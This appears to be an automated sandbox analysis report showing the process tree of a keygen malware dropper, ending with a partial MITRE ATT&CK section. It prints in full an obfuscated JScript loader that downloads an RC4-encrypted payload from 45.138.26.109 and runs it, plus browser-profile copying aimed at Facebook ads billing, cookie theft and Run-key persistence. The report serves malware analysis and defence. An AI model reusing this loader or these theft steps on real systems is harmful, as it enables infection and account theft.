                                                                                                                          cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\E3A5.tmp.exe"
                                                                                                                          5⤵
                                                                                                                            PID:1380
                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                              timeout /T 10 /NOBREAK
                                                                                                                              6⤵
                                                                                                                              • Delays execution with timeout.exe
                                                                                                                              PID:1684
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL
                                                                                                                          4⤵
                                                                                                                            PID:2244
                                                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                                                              ping 127.0.0.1
                                                                                                                              5⤵
                                                                                                                              • Runs ping.exe
                                                                                                                              PID:2320
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
                                                                                                                          keygen-step-3.exe
                                                                                                                          3⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:2320
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
                                                                                                                            4⤵
                                                                                                                              PID:308
                                                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                ping 1.1.1.1 -n 1 -w 3000
                                                                                                                                5⤵
                                                                                                                                • Runs ping.exe
                                                                                                                                PID:2268
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
                                                                                                                            keygen-step-4.exe
                                                                                                                            3⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Loads dropped DLL
                                                                                                                            • Checks whether UAC is enabled
                                                                                                                            PID:2616
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
                                                                                                                              4⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Modifies system certificate store
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:2288
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\O4TZJC9LPD\multitimer.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\O4TZJC9LPD\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
                                                                                                                                5⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Drops file in Windows directory
                                                                                                                                PID:524
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\O4TZJC9LPD\multitimer.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\O4TZJC9LPD\multitimer.exe" 1 101
                                                                                                                                  6⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:1676
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\W88VTE28N5\setups.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\W88VTE28N5\setups.exe" ll
                                                                                                                                5⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Loads dropped DLL
                                                                                                                                PID:2424
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-PDB9M.tmp\setups.tmp
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-PDB9M.tmp\setups.tmp" /SL5="$4023A,1845714,55808,C:\Users\Admin\AppData\Local\Temp\W88VTE28N5\setups.exe" ll
                                                                                                                                  6⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                  PID:2752
                                                                                                                                  • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                    "C:\Program Files\Internet Explorer\iexplore.exe" https://catser.inappapiurl.com/redirect/57a764d042bf8/
                                                                                                                                    7⤵
                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                    PID:2992
                                                                                                                                    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2992 CREDAT:275457 /prefetch:2
                                                                                                                                      8⤵
                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                      • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                      PID:268
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "cvbdfg" "http://45.138.26.109/?NDg5MTU0&toGcWXcuk&s2ht4=Yn6rSCJqvfzSk2bCIEBj38VndTjvVgfdOLq1Tbge-iQeELgYOmMxZC15E87etzkWNzVaYsJSK_kaOYA5G_MOWQrU53F3xxrIRc88jxxWB6jRUmO5JUV0U6Q4Rn6jIHqLMrhF0V0EwVQnNL5ogokvGBSO9Mjt3sfO9RD5xq-2T9bd3n5Md&oa1n4=x33QcvWYaRuPCYjDM_jdSqRBP0zYHliIxYq&dFOMjY4OQ==" "2"
                                                                                                                                        9⤵
                                                                                                                                          PID:1700
                                                                                                                                          • C:\Windows\SysWOW64\wscript.exe
                                                                                                                                            wsCripT //B //E:JScript 3.tMp "cvbdfg" "http://45.138.26.109/?NDg5MTU0&toGcWXcuk&s2ht4=Yn6rSCJqvfzSk2bCIEBj38VndTjvVgfdOLq1Tbge-iQeELgYOmMxZC15E87etzkWNzVaYsJSK_kaOYA5G_MOWQrU53F3xxrIRc88jxxWB6jRUmO5JUV0U6Q4Rn6jIHqLMrhF0V0EwVQnNL5ogokvGBSO9Mjt3sfO9RD5xq-2T9bd3n5Md&oa1n4=x33QcvWYaRuPCYjDM_jdSqRBP0zYHliIxYq&dFOMjY4OQ==" "2"
                                                                                                                                            10⤵
                                                                                                                                            • Blocklisted process makes network request
                                                                                                                                            PID:1620
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              "C:\Windows\System32\cmd.exe" /c 1oeqn.exe
                                                                                                                                              11⤵
                                                                                                                                              • Loads dropped DLL
                                                                                                                                              PID:2544
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1oeqn.exe
                                                                                                                                                1oeqn.exe
                                                                                                                                                12⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:2988
                                                                                                                                      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2992 CREDAT:799752 /prefetch:2
                                                                                                                                        8⤵
                                                                                                                                        • Modifies Internet Explorer settings
                                                                                                                                        • NTFS ADS
                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                        PID:1016
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "cvbdfg" "http://45.138.26.109/?NjM3MTA=&vUVCNldiT&s2ht4=Yn6rVCJqveDSk2bCIFxjw8V7dSTvVgfBOLq1UbgC-jgeDLgEOmMxeC15E9LeqzkKNylaYsJPU_kGOZg5H-5GRELU-2wzxxrISdMgklBLR7WVTzekcVloT5QlAmKvIFKXJrhF0VEFkVVzNfpomoknGViPrNTpwsfO9QzN2q-qT8rdwn5Md&oa1n4=x33QcvWfaRuPDojDM__dSqRGP0zYGViPxYq&AuiZNDE4MQ==" "2""
                                                                                                                                          9⤵
                                                                                                                                            PID:2952
                                                                                                                                            • C:\Windows\SysWOW64\wscript.exe
                                                                                                                                              wsCripT //B //E:JScript 3.tMp "cvbdfg" "http://45.138.26.109/?NjM3MTA=&vUVCNldiT&s2ht4=Yn6rVCJqveDSk2bCIFxjw8V7dSTvVgfBOLq1UbgC-jgeDLgEOmMxeC15E9LeqzkKNylaYsJPU_kGOZg5H-5GRELU-2wzxxrISdMgklBLR7WVTzekcVloT5QlAmKvIFKXJrhF0VEFkVVzNfpomoknGViPrNTpwsfO9QzN2q-qT8rdwn5Md&oa1n4=x33QcvWfaRuPDojDM__dSqRGP0zYGViPxYq&AuiZNDE4MQ==" "2""
                                                                                                                                              10⤵
                                                                                                                                              • Blocklisted process makes network request
                                                                                                                                              PID:524
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                "C:\Windows\System32\cmd.exe" /c m2tt0.exe
                                                                                                                                                11⤵
                                                                                                                                                  PID:3324
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\m2tt0.exe
                                                                                                                                                    m2tt0.exe
                                                                                                                                                    12⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:3284
                                                                                                                                          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2992 CREDAT:4142090 /prefetch:2
                                                                                                                                            8⤵
                                                                                                                                            • Modifies Internet Explorer settings
                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                            PID:4008
                                                                                                                                          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2992 CREDAT:2831423 /prefetch:2
                                                                                                                                            8⤵
                                                                                                                                            • Modifies Internet Explorer settings
                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                            PID:3556
                                                                                                                                          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2992 CREDAT:7156765 /prefetch:2
                                                                                                                                            8⤵
                                                                                                                                            • Modifies Internet Explorer settings
                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                            PID:3928
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Version.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Version.exe"
                                                                                                                                    4⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                    PID:1136
                                                                                                                                    • C:\Windows\SysWOW64\WScript.exe
                                                                                                                                      "C:\Windows\System32\WScript.exe" "C:\Program Files\unins0000.vbs"
                                                                                                                                      5⤵
                                                                                                                                        PID:2976
                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
                                                                                                                                          6⤵
                                                                                                                                          • Loads dropped DLL
                                                                                                                                          • Modifies registry class
                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:2328
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
                                                                                                                                      4⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Drops Chrome extension
                                                                                                                                      • Modifies system certificate store
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:3028
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                        5⤵
                                                                                                                                          PID:976
                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                            taskkill /f /im chrome.exe
                                                                                                                                            6⤵
                                                                                                                                            • Kills process with taskkill
                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                            PID:2280
                                                                                                                                        • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                          xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
                                                                                                                                          5⤵
                                                                                                                                          • Enumerates system info in registry
                                                                                                                                          PID:1392
                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
                                                                                                                                          5⤵
                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                          PID:880
                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xc8,0xcc,0xd0,0x9c,0xd4,0x7fef7906e00,0x7fef7906e10,0x7fef7906e20
                                                                                                                                            6⤵
                                                                                                                                              PID:2880
                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1064,6771989326549663391,18362037247467980560,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1076 /prefetch:2
                                                                                                                                              6⤵
                                                                                                                                                PID:2916
                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1064,6771989326549663391,18362037247467980560,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1420 /prefetch:8
                                                                                                                                                6⤵
                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                PID:620
                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1064,6771989326549663391,18362037247467980560,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1820 /prefetch:8
                                                                                                                                                6⤵
                                                                                                                                                  PID:2808
                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1064,6771989326549663391,18362037247467980560,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1928 /prefetch:1
                                                                                                                                                  6⤵
                                                                                                                                                    PID:1328
                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1064,6771989326549663391,18362037247467980560,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1940 /prefetch:1
                                                                                                                                                    6⤵
                                                                                                                                                      PID:2868
                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1064,6771989326549663391,18362037247467980560,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2232 /prefetch:1
                                                                                                                                                      6⤵
                                                                                                                                                        PID:2976
                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1064,6771989326549663391,18362037247467980560,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2332 /prefetch:1
                                                                                                                                                        6⤵
                                                                                                                                                          PID:1228
                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1064,6771989326549663391,18362037247467980560,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2432 /prefetch:1
                                                                                                                                                          6⤵
                                                                                                                                                            PID:2336
                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1064,6771989326549663391,18362037247467980560,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2820 /prefetch:1
                                                                                                                                                            6⤵
                                                                                                                                                              PID:932
                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1064,6771989326549663391,18362037247467980560,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2836 /prefetch:2
                                                                                                                                                              6⤵
                                                                                                                                                                PID:1108
                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1064,6771989326549663391,18362037247467980560,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4584 /prefetch:1
                                                                                                                                                                6⤵
                                                                                                                                                                  PID:780
                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1064,6771989326549663391,18362037247467980560,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5140 /prefetch:8
                                                                                                                                                                  6⤵
                                                                                                                                                                    PID:1068
                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1064,6771989326549663391,18362037247467980560,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5008 /prefetch:8
                                                                                                                                                                    6⤵
                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                    PID:2968
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
                                                                                                                                                                4⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                PID:2072
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe" >> NUL
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:536
                                                                                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                      ping 127.0.0.1
                                                                                                                                                                      6⤵
                                                                                                                                                                      • Runs ping.exe
                                                                                                                                                                      PID:692
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:2520
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:752
                                                                                                                                                                  • C:\ProgramData\1829564.exe
                                                                                                                                                                    "C:\ProgramData\1829564.exe"
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                    PID:1736
                                                                                                                                                                  • C:\ProgramData\4056038.exe
                                                                                                                                                                    "C:\ProgramData\4056038.exe"
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                                    PID:2072
                                                                                                                                                                    • C:\ProgramData\Windows Host\Windows Host.exe
                                                                                                                                                                      "C:\ProgramData\Windows Host\Windows Host.exe"
                                                                                                                                                                      6⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:3168
                                                                                                                                                                  • C:\ProgramData\7037222.exe
                                                                                                                                                                    "C:\ProgramData\7037222.exe"
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                    PID:3104
                                                                                                                                                                    • C:\ProgramData\7037222.exe
                                                                                                                                                                      "{path}"
                                                                                                                                                                      6⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:3628
                                                                                                                                                                    • C:\ProgramData\7037222.exe
                                                                                                                                                                      "{path}"
                                                                                                                                                                      6⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                      PID:3636
                                                                                                                                                                  • C:\ProgramData\4751345.exe
                                                                                                                                                                    "C:\ProgramData\4751345.exe"
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                    PID:3156
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                  PID:3248
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:3368
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                    PID:3540
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                    PID:3116
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                    5⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                    PID:3984

                                                                                                                                                          Network

                                                                                                                                                          MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                          Persistence

                                                                                                                                                          Registry Run Keys / Startup Folder

                                                                                                                                                          1
                                                                                                                                                          T1060

                                                                                                                                                          Defense Evasion

